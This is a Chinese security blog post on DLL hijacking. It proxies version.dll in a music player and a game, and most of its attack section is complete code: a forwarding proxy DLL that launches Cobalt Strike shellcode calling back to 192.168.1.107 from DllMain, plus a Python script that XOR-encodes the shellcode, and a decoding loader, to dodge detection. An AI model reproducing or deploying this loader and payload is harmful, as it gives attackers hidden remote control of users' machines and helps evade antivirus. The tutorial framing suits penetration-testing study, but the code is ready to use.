dll劫持实例学习
2023-5-31 22:47:0 Author: xz.aliyun.com(查看原文) 阅读量:26 收藏

dll劫持的顺序

如果程序需要加载一个相对路径的dll文件,它将从当前目录下尝试查找,如果找不到,则按照如下顺序寻找:

1.加载应用程序的目录
2.系统目录
3.16 位系统目录
4.Windows目录
5.当前目录
6.PATH 环境变量中列出的目录

这里我们拿某游戏倩**魂来测试。

使用Process Monitor添加过滤器。

可以发现有大量dll未找到。使用dumpbin来查看该exe的导入表。我们的dll对应编写导出表。

可以看到UxTheme.dll,如下。

UxTheme.dll
                5AB964 Import Address Table
                605254 Import Name Table
                     0 time date stamp
                     0 Index of first forwarder reference

                   2B GetThemePartSize
                   40 IsThemeBackgroundPartiallyTransparent
                   3B GetWindowTheme
                   32 GetThemeSysColor
                   1B GetCurrentThemeName
                   22 GetThemeColor
                    A DrawThemeBackground
                    9 CloseThemeData
                   43 OpenThemeData
                   10 DrawThemeText
                    E DrawThemeParentBackground
                   3D IsAppThemed

编写dll,这里我们要对应导入导出的函数。且我们生成的dll和对应的exe版本位数一定要一样。

#include "pch.h"
#include <Windows.h>
#include <stdlib.h>

extern "C" __declspec(dllexport) int GetThemePartSize() {
    return 0;
}
extern "C" __declspec(dllexport) int IsThemeBackgroundPartiallyTransparent() {
    return 0;
}
extern "C" __declspec(dllexport) int GetWindowTheme() {
    return 0;
}
extern "C" __declspec(dllexport) int GetThemeSysColor() {
    return 0;
}
extern "C" __declspec(dllexport) int GetCurrentThemeName() {
    return 0;
}
extern "C" __declspec(dllexport) int GetThemeColor() {
    return 0;
}
extern "C" __declspec(dllexport) int DrawThemeBackground() {
    return 0;
}
extern "C" __declspec(dllexport) int CloseThemeData() {
    return 0;
}
extern "C" __declspec(dllexport) int OpenThemeData() {
    return 0;
}
extern "C" __declspec(dllexport) int DrawThemeText() {
    return 0;
}
extern "C" __declspec(dllexport) int DrawThemeParentBackground() {
    return 0;
}
extern "C" __declspec(dllexport) int IsAppThemed() {
    return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

接下来我们测试下某音乐软件。

这里可以看到存在version.dll。在很多时候我们添加dll但是会影响程序正常的运行,所以我们可以通过转发来达到程序正常上线的效果。

点击生成会生成一个version.cpp文件。

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

version.cpp代码添加到dllmain.cpp。然后把原始的version.cpp也就是C:\Windows\SysWOW64\version.dll修改名字为versionOrg.dll放在酷狗同目录下。

可以看到程序正常执行了。

上线cs。cs生成x86的payload。

修改dll代码为:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/* length: 798 bytes */
unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x6a\x34\x6f\x4f\x00\xab\x2a\x47\xd3\x0d\xfe\x53\xab\xf7\x18\xdb\xa4\xa3\x16\x40\x86\xe2\x91\x3a\xb0\x3e\x20\x14\x11\xca\x25\xd4\xd6\x56\x00\x26\x9a\x58\x45\x72\xc0\xe9\xef\xb2\x0b\x92\x0b\x5a\x7e\xd5\xe5\xbc\x7e\xe9\xba\xc8\xc9\x5b\x8f\x1e\xeb\xcb\x7f\x0d\x9b\x10\x91\x2b\xa9\xcb\xce\x8b\x53\xd1\xa1\x36\xc9\x07\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\x2f\x04\xfa\x63\x8e\xd7\xeb\xd6\x89\x1d\x54\x81\x11\x80\xf7\xd2\x94\xb4\x19\x33\xe9\x1f\xd5\xa3\x07\x3a\xe1\x78\x28\xec\xfa\xdd\xbb\x9d\x5e\x48\xbf\xde\x20\xb5\x0c\xec\xd5\xf2\x84\x6f\xd8\x1b\x72\x0e\x1d\x45\x24\x98\x97\xaf\x4d\x2a\xc1\x95\x79\xd4\xf9\x54\xae\x83\x2a\x32\xa3\xee\xd4\xcc\xf4\xd0\x55\x50\xfe\x27\x93\x12\x57\x92\xf1\x06\x59\x3f\x2d\x06\xfa\x19\xab\x0e\xf4\x2f\x52\x12\x33\xc5\x9d\xc7\x6a\x77\x1f\x97\x33\x1c\x6b\x90\x6e\x2c\x6d\xcf\x15\x57\x5e\x5e\xf6\xf7\x48\x40\x81\x50\x86\x07\x7a\xc2\x7e\xfd\x70\x57\x84\xc7\x0f\x0e\x6e\xbb\xa2\x8e\xab\xb9\xab\xb7\xfc\x83\xab\xc3\x56\x8c\xf4\xba\xf4\x8a\x48\x54\x93\x1c\x0f\x2a\xf4\xa4\x25\x67\x84\x5e\x6a\x02\x04\x51\x2a\x19\x65\x5f\x12\xb4\xa3\xa5\x7b\xd6\xda\xf9\xb2\xaf\x73\x1e\x0c\x93\x24\x16\x5a\x5b\x55\x5d\x46\x11\x65\x7f\xa8\x9b\x86\x1e\x29\x96\x9f\x31\xb9\x6e\x57\x2c\x9c\x5d\xdf\x18\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x37\x00\x17\x50\x65\xea";
DWORD WINAPI run(LPVOID lpParameter) {
    void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, buf, sizeof buf);
    ((void(*)())exec)();
    return 0;
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, run, NULL, 0, NULL);
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

成功上线。

这里再对shellcode进行简单的xor。
python执行

import binascii

def xor():
    shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x6a\x34\x6f\x4f\x00\xab\x2a\x47\xd3\x0d\xfe\x53\xab\xf7\x18\xdb\xa4\xa3\x16\x40\x86\xe2\x91\x3a\xb0\x3e\x20\x14\x11\xca\x25\xd4\xd6\x56\x00\x26\x9a\x58\x45\x72\xc0\xe9\xef\xb2\x0b\x92\x0b\x5a\x7e\xd5\xe5\xbc\x7e\xe9\xba\xc8\xc9\x5b\x8f\x1e\xeb\xcb\x7f\x0d\x9b\x10\x91\x2b\xa9\xcb\xce\x8b\x53\xd1\xa1\x36\xc9\x07\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\x2f\x04\xfa\x63\x8e\xd7\xeb\xd6\x89\x1d\x54\x81\x11\x80\xf7\xd2\x94\xb4\x19\x33\xe9\x1f\xd5\xa3\x07\x3a\xe1\x78\x28\xec\xfa\xdd\xbb\x9d\x5e\x48\xbf\xde\x20\xb5\x0c\xec\xd5\xf2\x84\x6f\xd8\x1b\x72\x0e\x1d\x45\x24\x98\x97\xaf\x4d\x2a\xc1\x95\x79\xd4\xf9\x54\xae\x83\x2a\x32\xa3\xee\xd4\xcc\xf4\xd0\x55\x50\xfe\x27\x93\x12\x57\x92\xf1\x06\x59\x3f\x2d\x06\xfa\x19\xab\x0e\xf4\x2f\x52\x12\x33\xc5\x9d\xc7\x6a\x77\x1f\x97\x33\x1c\x6b\x90\x6e\x2c\x6d\xcf\x15\x57\x5e\x5e\xf6\xf7\x48\x40\x81\x50\x86\x07\x7a\xc2\x7e\xfd\x70\x57\x84\xc7\x0f\x0e\x6e\xbb\xa2\x8e\xab\xb9\xab\xb7\xfc\x83\xab\xc3\x56\x8c\xf4\xba\xf4\x8a\x48\x54\x93\x1c\x0f\x2a\xf4\xa4\x25\x67\x84\x5e\x6a\x02\x04\x51\x2a\x19\x65\x5f\x12\xb4\xa3\xa5\x7b\xd6\xda\xf9\xb2\xaf\x73\x1e\x0c\x93\x24\x16\x5a\x5b\x55\x5d\x46\x11\x65\x7f\xa8\x9b\x86\x1e\x29\x96\x9f\x31\xb9\x6e\x57\x2c\x9c\x5d\xdf\x18\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x37\x00\x17\x50\x65\xea"
    #对shellcode进行异或加密
    shellcode = binascii.b2a_hex(shellcode).decode('utf-8')
    shellcode = bytearray.fromhex(shellcode)
    for i in range(len(shellcode)):
        print(shellcode[i])
        shellcode[i] ^= 0x20
    shellcode = binascii.b2a_hex(shellcode).decode('utf-8')
    for i in range(len(shellcode)):
            if i % 2 == 0:
                print("\\x" + shellcode[i] + shellcode[i + 1], end = '')

if __name__ == '__main__':
    xor()

修改dll代码为:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/* length: 798 bytes */
unsigned char buf[] = "\xdc\xc8\xa9\x20\x20\x20\x40\xa9\xc5\x11\xf2\x44\xab\x72\x10\xab\x72\x2c\xab\x72\x34\xab\x52\x08\x2f\x97\x6a\x06\x11\xdf\x11\xe0\x8c\x1c\x41\x5c\x22\x0c\x00\xe1\xef\x2d\x21\xe7\xc2\xd0\x72\x77\xab\x72\x30\xab\x62\x1c\x21\xf0\xab\x60\x58\xa5\xe0\x54\x6a\x21\xf0\x70\xab\x68\x38\xab\x78\x00\x21\xf3\xc3\x1c\x69\xab\x14\xab\x21\xf6\x11\xdf\x11\xe0\x8c\xe1\xef\x2d\x21\xe7\x18\xc0\x55\xd4\x23\x5d\xd8\x1b\x5d\x04\x55\xc2\x78\xab\x78\x04\x21\xf3\x46\xab\x2c\x6b\xab\x78\x3c\x21\xf3\xab\x24\xab\x21\xf0\xa9\x64\x04\x04\x7b\x7b\x41\x79\x7a\x71\xdf\xc0\x78\x7f\x7a\xab\x32\xcb\xa6\x7d\x48\x4e\x45\x54\x20\x48\x57\x49\x4e\x49\x74\x48\x6c\x57\x06\x27\xdf\xf5\x11\xdf\x77\x77\x77\x77\x77\x48\x1a\x76\x59\x87\xdf\xf5\xc9\xa4\x20\x20\x20\x7b\x11\xe9\x71\x71\x4a\x23\x71\x71\x48\x70\x20\x20\x20\x73\x70\x48\x77\xa9\xbf\xe6\xdf\xf5\xcb\x50\x7b\x11\xf2\x72\x48\x20\x22\x60\xa4\x72\x72\x72\x73\x72\x70\x48\xcb\x75\x0e\x1b\xdf\xf5\xa9\xe6\xa3\xe3\x70\x11\xdf\x77\x77\x4a\xdf\x73\x76\x48\x0d\x26\x38\x5b\xdf\xf5\xa5\xe0\x2f\xa4\xe3\x21\x20\x20\x11\xdf\xa5\xd6\x54\x24\xa9\xd9\xcb\x29\x48\x8a\xe5\xc2\x7d\xdf\xf5\xa9\xe1\x48\x65\x01\x7e\x11\xdf\xf5\x11\xdf\x77\x4a\x27\x71\x76\x70\x48\x97\x77\xc0\x2b\xdf\xf5\x9f\x20\x0f\x20\x20\x19\xe7\x54\x97\x11\xdf\xc9\xb1\x21\x20\x20\xc9\xe9\x21\x20\x20\xc8\xab\xdf\xdf\xdf\x0f\x4a\x14\x4f\x6f\x20\x8b\x0a\x67\xf3\x2d\xde\x73\x8b\xd7\x38\xfb\x84\x83\x36\x60\xa6\xc2\xb1\x1a\x90\x1e\x00\x34\x31\xea\x05\xf4\xf6\x76\x20\x06\xba\x78\x65\x52\xe0\xc9\xcf\x92\x2b\xb2\x2b\x7a\x5e\xf5\xc5\x9c\x5e\xc9\x9a\xe8\xe9\x7b\xaf\x3e\xcb\xeb\x5f\x2d\xbb\x30\xb1\x0b\x89\xeb\xee\xab\x73\xf1\x81\x16\xe9\x27\x20\x75\x53\x45\x52\x0d\x61\x47\x45\x4e\x54\x1a\x00\x6d\x4f\x5a\x49\x4c\x4c\x41\x0f\x15\x0e\x10\x00\x08\x43\x4f\x4d\x50\x41\x54\x49\x42\x4c\x45\x1b\x00\x6d\x73\x69\x65\x00\x19\x0e\x10\x1b\x00\x77\x49\x4e\x44\x4f\x57\x53\x00\x6e\x74\x00\x16\x0e\x10\x1b\x00\x74\x52\x49\x44\x45\x4e\x54\x0f\x15\x0e\x10\x1b\x00\x62\x6f\x69\x65\x19\x1b\x65\x6e\x75\x73\x09\x2d\x2a\x20\x06\x0f\x24\xda\x43\xae\xf7\xcb\xf6\xa9\x3d\x74\xa1\x31\xa0\xd7\xf2\xb4\x94\x39\x13\xc9\x3f\xf5\x83\x27\x1a\xc1\x58\x08\xcc\xda\xfd\x9b\xbd\x7e\x68\x9f\xfe\x00\x95\x2c\xcc\xf5\xd2\xa4\x4f\xf8\x3b\x52\x2e\x3d\x65\x04\xb8\xb7\x8f\x6d\x0a\xe1\xb5\x59\xf4\xd9\x74\x8e\xa3\x0a\x12\x83\xce\xf4\xec\xd4\xf0\x75\x70\xde\x07\xb3\x32\x77\xb2\xd1\x26\x79\x1f\x0d\x26\xda\x39\x8b\x2e\xd4\x0f\x72\x32\x13\xe5\xbd\xe7\x4a\x57\x3f\xb7\x13\x3c\x4b\xb0\x4e\x0c\x4d\xef\x35\x77\x7e\x7e\xd6\xd7\x68\x60\xa1\x70\xa6\x27\x5a\xe2\x5e\xdd\x50\x77\xa4\xe7\x2f\x2e\x4e\x9b\x82\xae\x8b\x99\x8b\x97\xdc\xa3\x8b\xe3\x76\xac\xd4\x9a\xd4\xaa\x68\x74\xb3\x3c\x2f\x0a\xd4\x84\x05\x47\xa4\x7e\x4a\x22\x24\x71\x0a\x39\x45\x7f\x32\x94\x83\x85\x5b\xf6\xfa\xd9\x92\x8f\x53\x3e\x2c\xb3\x04\x36\x7a\x7b\x75\x7d\x66\x31\x45\x5f\x88\xbb\xa6\x3e\x09\xb6\xbf\x11\x99\x4e\x77\x0c\xbc\x7d\xff\x38\x20\x48\xd0\x95\x82\x76\xdf\xf5\x4a\x60\x48\x20\x30\x20\x20\x48\x20\x20\x60\x20\x77\x48\x78\x84\x73\xc5\xdf\xf5\xb3\x99\x20\x20\x20\x20\x21\xf9\x71\x73\xa9\xc7\x77\x48\x20\x00\x20\x20\x73\x76\x48\x32\xb6\xa9\xc2\xdf\xf5\xa5\xe0\x54\xe6\xab\x27\x21\xe3\xa5\xe0\x55\xc5\x78\xe3\xc8\x89\xdd\xdf\xdf\x11\x19\x12\x0e\x11\x16\x18\x0e\x11\x0e\x11\x10\x17\x20\x37\x70\x45\xca";
DWORD WINAPI run(LPVOID lpParameter) {
    PVOID shellcode_exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, buf, sizeof buf);
    for (int i = 0; i < sizeof buf; i++)
    {
        ((char*)shellcode_exec)[i] = (((char*)shellcode_exec)[i]) ^ '\x20';
    }
    ((void(*)())shellcode_exec)();
    return 0;
}
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, run, NULL, 0, NULL);
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}


文章来源: https://xz.aliyun.com/t/12579
如有侵权请联系:admin#unsafe.sh